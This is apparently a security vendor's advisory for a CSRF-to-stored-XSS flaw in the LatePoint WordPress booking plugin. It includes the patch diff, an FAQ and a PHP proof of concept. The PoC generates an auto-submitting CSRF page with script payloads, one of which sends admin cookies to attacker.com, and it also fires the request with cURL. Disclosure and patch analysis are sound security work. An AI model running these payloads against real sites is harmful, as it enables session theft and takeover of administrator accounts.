Atomic Edge analysis of CVE-2026-2324:
The vulnerability exists in the reload_preview() function within the booking_form_settings_controller.php file. This function lacked nonce validation, allowing Cross-Site Request Forgery attacks. The function handles AJAX requests to update booking form preview settings, including HTML content fields that are rendered without proper output escaping in the _booking_form_preview.php view file. Attackers can craft malicious requests targeting the /wp-admin/admin-ajax.php endpoint with action=latepoint_booking_form_settings_controller_reload_preview. The request can inject JavaScript payloads into settings like side_panel_description, main_panel_content_before, or main_panel_content_after. When an administrator views the booking form settings page, the stored XSS payload executes in their browser session. The patch adds nonce verification via $this->check_nonce(‘reload_preview’) and implements wp_kses_post() output escaping in the preview template. Successful exploitation allows attackers to perform administrative actions, steal session cookies, or deface the WordPress site.
CVE-2026-2324: LatePoint – Calendar Booking Plugin for Appointments and Events <= 5.2.7 – Cross-Site Request Forgery in Booking Form Settings Update to Stored Cross-Site Scripting (latepoint)
CVE-2026-2324
latepoint
5.2.7
5.2.8
Analysis Overview
Differential between vulnerable and patched code
--- a/latepoint/latepoint.php
+++ b/latepoint/latepoint.php
@@ -2,7 +2,7 @@
/**
* Plugin Name: LatePoint
* Description: Appointment Scheduling Software for WordPress
- * Version: 5.2.7
+ * Version: 5.2.8
* Author: LatePoint
* Author URI: https://latepoint.com
* Plugin URI: https://latepoint.com
@@ -29,7 +29,7 @@
* LatePoint version.
*
*/
- public $version = '5.2.7';
+ public $version = '5.2.8';
public $db_version = '2.3.0';
--- a/latepoint/lib/controllers/booking_form_settings_controller.php
+++ b/latepoint/lib/controllers/booking_form_settings_controller.php
@@ -23,6 +23,9 @@
}
public function reload_preview() {
+ // Verify nonce.
+ $this->check_nonce( 'reload_preview' );
+
OsStepsHelper::set_cart_object();
OsStepsHelper::set_booking_object();
OsStepsHelper::set_restrictions();
--- a/latepoint/lib/controllers/customers_controller.php
+++ b/latepoint/lib/controllers/customers_controller.php
@@ -150,7 +150,8 @@
$this->check_nonce( 'new_customer' );
$customer = new OsCustomerModel();
// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
- $customer->set_data( $this->params['customer'], LATEPOINT_PARAMS_SCOPE_PUBLIC );
+ // Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+ $customer->set_data( $this->params['customer'], OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
if ( $customer->save() ) {
// translators: %s is the html of a customer edit link
$response_html = sprintf( __( 'Customer Created ID: %s', 'latepoint' ), '<span class="os-notification-link" ' . OsCustomerHelper::quick_customer_btn_html( $customer->id ) . '>' . $customer->id . '</span>' );
@@ -180,7 +181,8 @@
} else {
$old_customer_data = $customer->get_data_vars();
// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
- $customer->set_data( $this->params['customer'], LATEPOINT_PARAMS_SCOPE_PUBLIC );
+ // Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+ $customer->set_data( $this->params['customer'], OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
if ( $customer->save() ) {
// translators: %s is the html of a customer edit link
$response_html = sprintf( __( 'Customer Updated ID: %s', 'latepoint' ), '<span class="os-notification-link" ' . OsCustomerHelper::quick_customer_btn_html( $customer->id ) . '>' . $customer->id . '</span>' );
--- a/latepoint/lib/controllers/orders_controller.php
+++ b/latepoint/lib/controllers/orders_controller.php
@@ -131,8 +131,8 @@
$is_new_customer = true;
}
// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
- // Use 'public' role to restrict which fields can be set via user input.
- $customer->set_data( $customer_params, LATEPOINT_PARAMS_SCOPE_PUBLIC );
+ // Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+ $customer->set_data( $customer_params, OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
if ( $customer->save() ) {
if ( $is_new_customer ) {
do_action( 'latepoint_customer_created', $customer );
--- a/latepoint/lib/helpers/customer_import_helper.php
+++ b/latepoint/lib/helpers/customer_import_helper.php
@@ -181,7 +181,7 @@
$save_data[$column_mapping[$column_index]] = $field_value;
}
}
- $customer->set_data($save_data);
+ $customer->set_data($save_data, 'public');
if ($customer->save()) {
$updatedCount++;
--- a/latepoint/lib/helpers/settings_helper.php
+++ b/latepoint/lib/helpers/settings_helper.php
@@ -208,7 +208,7 @@
}
// Security check: Ensure no dangerous SQL keywords in CREATE statement.
- $dangerous_keywords = array( 'EXEC', 'EXECUTE', 'CALL', 'LOAD_FILE', 'INTO OUTFILE', 'INTO DUMPFILE' );
+ $dangerous_keywords = array( 'SELECT', 'UNION', 'EXEC', 'EXECUTE', 'CALL', 'LOAD_FILE', 'INTO OUTFILE', 'INTO DUMPFILE' );
foreach ( $dangerous_keywords as $keyword ) {
if ( stripos( $create_statement, $keyword ) !== false ) {
throw new Exception( sprintf( __( 'Security: Dangerous SQL keyword "%s" detected in CREATE statement', 'latepoint' ), esc_html( $keyword ) ) );
@@ -231,6 +231,11 @@
if ( is_array( $table_data['data'] ) ) {
foreach ( $table_data['data'] as $row ) {
if ( is_array( $row ) ) {
+ // Security fix: Prevent mass assignment of wordpress_user_id during import.
+ if ( $table === $wpdb->prefix . 'latepoint_customers' ) {
+ unset( $row['wordpress_user_id'] );
+ }
+
$insert_result = $wpdb->insert( $table, $row );
if ( $insert_result === false ) {
// Log error but continue with other rows.
--- a/latepoint/lib/views/booking_form_settings/_booking_form_preview.php
+++ b/latepoint/lib/views/booking_form_settings/_booking_form_preview.php
@@ -20,20 +20,37 @@
</div>
</div>
<div class="bf-side-heading editable-setting" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][side_panel_heading]" contenteditable="true"><?php echo wp_strip_all_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'side_panel_heading')); ?></div>
- <div class="bf-side-desc os-editable-basic editable-setting" data-setting-key="[<?php echo $selected_step_code;?>][side_panel_description]"><?php echo strip_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'side_panel_description'), ['a', 'i', 'u', 'b', 'br']); ?></div>
+ <div
+ class="bf-side-desc os-editable-basic editable-setting"
+ data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][side_panel_description]"
+ >
+ <?php echo strip_tags( OsStepsHelper::get_step_setting_value( $selected_step_code, 'side_panel_description' ), [ 'a', 'i', 'u', 'b', 'br' ] ); ?>
+ </div>
</div>
<div class="side-panel-extra os-editable editable-setting" data-setting-key="[shared][steps_support_text]">
- <?php echo OsSettingsHelper::get_steps_support_text(); ?>
+ <?php echo wp_kses_post( OsSettingsHelper::get_steps_support_text() ); ?>
</div>
</div>
<div class="bf-main-panel">
<div class="bf-main-heading editable-setting" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_heading]" contenteditable="true"><?php echo wp_strip_all_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_heading')); ?></div>
<div class="bf-main-panel-content-wrapper">
- <div class="bf-main-panel-content-before os-editable editable-setting" data-placeholder="+" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_content_before]"><?php echo OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_content_before'); ?></div>
+ <div
+ class="bf-main-panel-content-before os-editable editable-setting"
+ data-placeholder="+"
+ data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][main_panel_content_before]"
+ >
+ <?php echo wp_kses_post( OsStepsHelper::get_step_setting_value( $selected_step_code, 'main_panel_content_before' ) ); ?>
+ </div>
<div class="bf-main-panel-content">
<?php echo OsStepsHelper::get_step_content_preview($selected_step_code); ?>
</div>
- <div class="bf-main-panel-content-after os-editable editable-setting" data-placeholder="+" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_content_after]"><?php echo OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_content_after'); ?></div>
+ <div
+ class="bf-main-panel-content-after os-editable editable-setting"
+ data-placeholder="+"
+ data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][main_panel_content_after]"
+ >
+ <?php echo wp_kses_post( OsStepsHelper::get_step_setting_value( $selected_step_code, 'main_panel_content_after' ) ); ?>
+ </div>
</div>
<div class="bf-main-panel-buttons">
<div class="bf-btn bf-cancel-save-btn">
--- a/latepoint/lib/views/booking_form_settings/show.php
+++ b/latepoint/lib/views/booking_form_settings/show.php
@@ -14,6 +14,7 @@
</div>
<form class="booking-form-preview-settings"
data-route-name="<?php echo esc_attr(OsRouterHelper::build_route_name( 'booking_form_settings', 'reload_preview' )); ?>">
+ <?php wp_nonce_field( 'reload_preview', '_wpnonce', false ); ?>
<div class="bf-heading">
<div class="latepoint-icon latepoint-icon-browser"></div>
<div><?php esc_html_e( 'Appearance', 'latepoint' ); ?></div>Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2324 - LatePoint – Calendar Booking Plugin for Appointments and Events <= 5.2.7 - Cross-Site Request Forgery in Booking Form Settings Update to Stored Cross-Site Scripting
<?php
$target_url = 'http://vulnerable-site.com';
// CSRF payload that injects XSS into booking form settings
$csrf_payload = array(
'action' => 'latepoint_booking_form_settings_controller_reload_preview',
'selected_step_code' => 'service',
'service' => array(
'side_panel_description' => '<script>alert(document.cookie)</script>',
'main_panel_content_before' => '<img src=x onerror=alert("XSS")>',
'main_panel_content_after' => '<svg/onload=alert("AtomicEdge")>'
),
'shared' => array(
'steps_support_text' => '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
)
);
// Generate malicious HTML page that auto-submits the CSRF request
$html_poc = '<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-2324 CSRF PoC</title>
</head>
<body>
<h2>LatePoint CSRF to Stored XSS PoC</h2>
<p>When an admin visits this page, it will inject XSS into booking form settings.</p>
<form id="csrf_form" action="' . $target_url . '/wp-admin/admin-ajax.php" method="POST">';
foreach ($csrf_payload as $key => $value) {
if (is_array($value)) {
foreach ($value as $subkey => $subvalue) {
$html_poc .= 'n <input type="hidden" name="' . htmlspecialchars($key) . '[' . htmlspecialchars($subkey) . ']" value="' . htmlspecialchars($subvalue) . '">';
}
} else {
$html_poc .= 'n <input type="hidden" name="' . htmlspecialchars($key) . '" value="' . htmlspecialchars($value) . '">';
}
}
$html_poc .= '
</form>
<script>
document.getElementById("csrf_form").submit();
console.log("CSRF request sent to ' . $target_url . '");
</script>
</body>
</html>';
// Save the PoC to file
file_put_contents('cve-2026-2324-poc.html', $html_poc);
echo "PoC HTML file generated: cve-2026-2324-poc.htmln";
echo "Host this file and trick an admin to visit it.n";
echo "The XSS payload will be stored in booking form settings.n";
// Alternative: Direct cURL demonstration
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($csrf_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo "nDirect request response preview: " . substr($response, 0, 200) . "...n";
?>Frequently Asked Questions
What is CVE-2026-2324?
Understanding the vulnerabilityCVE-2026-2324 is a Cross-Site Request Forgery (CSRF) vulnerability found in the LatePoint Calendar Booking Plugin for WordPress, affecting versions up to and including 5.2.7. It allows unauthenticated attackers to exploit the reload_preview() function to update settings and inject malicious scripts.
How does the vulnerability work?
Mechanism of the attackThe vulnerability arises from missing nonce validation in the reload_preview() function, allowing attackers to send forged requests to update booking form settings. If an administrator is tricked into clicking a malicious link, the attacker can inject JavaScript payloads that execute in the administrator’s session.
Who is affected by this vulnerability?
Identifying at-risk usersAny WordPress site using the LatePoint Calendar Booking Plugin version 5.2.7 or earlier is affected by this vulnerability. Site administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verificationTo check if your site is vulnerable, verify the version of the LatePoint plugin installed. If it is version 5.2.7 or earlier, your site is at risk and should be updated immediately.
How can I fix the vulnerability?
Updating the pluginThe vulnerability is patched in version 5.2.8 of the LatePoint plugin. Administrators should update to this version or later to mitigate the vulnerability and ensure nonce validation is properly implemented.
What does the CVSS score of 6.1 indicate?
Understanding severity levelsA CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability is not critical, it can still be exploited under certain conditions, potentially leading to significant consequences if not addressed.
What are the practical risks of this vulnerability?
Potential impactsIf exploited, this vulnerability can allow attackers to perform administrative actions, inject malicious scripts, steal session cookies, or deface the website. This can lead to data breaches or loss of site integrity.
What is nonce validation and why is it important?
Security mechanism explainedNonce validation is a security feature used in WordPress to verify that requests made to the server are intentional and originate from the site itself. It helps prevent CSRF attacks by ensuring that only legitimate requests from authenticated users are processed.
How does the proof of concept demonstrate the issue?
Example exploitationThe proof of concept illustrates how an attacker can craft a malicious CSRF request that injects XSS payloads into the booking form settings. It shows how an attacker can exploit the vulnerability to execute JavaScript in an administrator’s session, demonstrating the potential impact.
What should I do if I cannot update the plugin immediately?
Mitigation strategiesIf immediate updates are not possible, consider disabling the LatePoint plugin until it can be updated. Additionally, review user roles and permissions to limit access to the settings affected by this vulnerability.
Are there any other security measures I should take?
Best practices for WordPress securityIn addition to updating the plugin, implement security best practices such as regular backups, using a web application firewall, and monitoring for unusual activity on your site to enhance overall security.
Where can I find more information about this vulnerability?
Resources for further readingMore information about CVE-2026-2324 can be found on the official CVE database, security advisories from the plugin developer, and security-focused blogs that analyze vulnerabilities in WordPress plugins.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
